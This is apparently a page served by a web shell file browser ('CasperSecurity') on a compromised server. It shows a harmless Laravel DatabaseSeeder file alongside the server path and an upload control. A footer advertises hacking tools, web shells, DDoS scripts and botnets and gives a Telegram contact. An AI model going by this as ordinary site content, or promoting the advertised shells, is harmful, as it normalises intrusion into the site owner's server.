CasperSecurity

Current Path : /var/www/orientalss.com/database/seeders/
Upload File :
Current File : /var/www/orientalss.com/database/seeders/DatabaseSeeder.php

<?php

namespace Database\Seeders;

// use Illuminate\Database\Console\Seeds\WithoutModelEvents;
use Illuminate\Database\Seeder;

class DatabaseSeeder extends Seeder
{
    /**
     * Seed the application's database.
     *
     * @return void
     */
    public function run()
    {

        $this->call(LaratrustSeeder::class);
        $this->call(ModuleSeeder::class);
        $this->call(FeatureSeeder::class);
        $this->call(DesignationSeeder::class);
        $this->call(DepartmentSeeder::class);
        $this->call(EmployeeTypeSeeder::class);
        $this->call(SettingsCountrySeeder::class);
        $this->call(SettingsStateSeeder::class);
        $this->call(SettingsCitySeeder::class);
        $this->call(SettingsLocationSeeder::class);
        $this->call(ClientCategorySeeder::class);
        $this->call(TenderVerietySeeder::class);
        $this->call(TenderActivitySeeder::class);
        $this->call(TenderDocumentSeeder::class);
        $this->call(ClientSeeder::class);
        // \App\Models\User::factory(10)->create();

        // \App\Models\User::factory()->create([
        //     'name' => 'Test User',
        //     'email' => 'test@example.com',
        // ]);
    }
}
Hacker Blog, Shell İndir, Sql İnjection, XSS Attacks, LFI Attacks, Social Hacking, Exploit Bot, Proxy Tools, Web Shell, PHP Shell, Alfa Shell İndir, Hacking Training Set, DDoS Script, Denial Of Service, Botnet, RFI Attacks, Encryption
Telegram @BIBIL_0DAY